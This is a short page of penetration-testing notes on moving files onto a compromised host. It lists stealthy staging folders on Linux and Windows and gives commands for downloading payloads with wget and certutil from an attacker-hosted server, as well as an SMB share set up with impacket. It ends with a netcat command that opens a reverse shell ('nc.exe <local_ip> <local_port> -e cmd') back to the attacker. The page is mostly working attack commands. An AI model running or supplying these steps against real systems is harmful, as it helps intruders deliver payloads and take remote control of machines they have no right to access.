File Transfer

Where to Transfer

On Linux, transfer files to /dev/shm
On Windows, transfer files to C:\Windows\Tasks

They are chosen to be the locations for file transfer because they are world-readable/writable/executable and more stealthy than /tmp and C:\Windows\Temp.

Linux

On attack machine, host a server:

updog

On victim machine, download with wget:

wget http://<local_ip>/linpeas.sh

Windows

certutil

On attack machine, host a server:

updog

On victim machine, download with certutil:

certutil -urlcache -f http://<local_ip>/payload.exe payload.exe

impacket-smbserver

If certutil is not on the compromised Windows machine, we can transfer files with SMB server instead.

On Kali, create a SMB server:

impacket-smbserver ret2basic /usr/share/windows-resources/binaries/

Here ret2basic is the name of the share and /usr/share/windows-resources/binaries/ is the directory that I want to host. On the compromised Windows machine:

net use * \\<local_ip>\ret2basic
Z:\nc.exe <local_ip> <local_port> -e cmd

PreviousTTY NextMetasploit

Last updated 2 years ago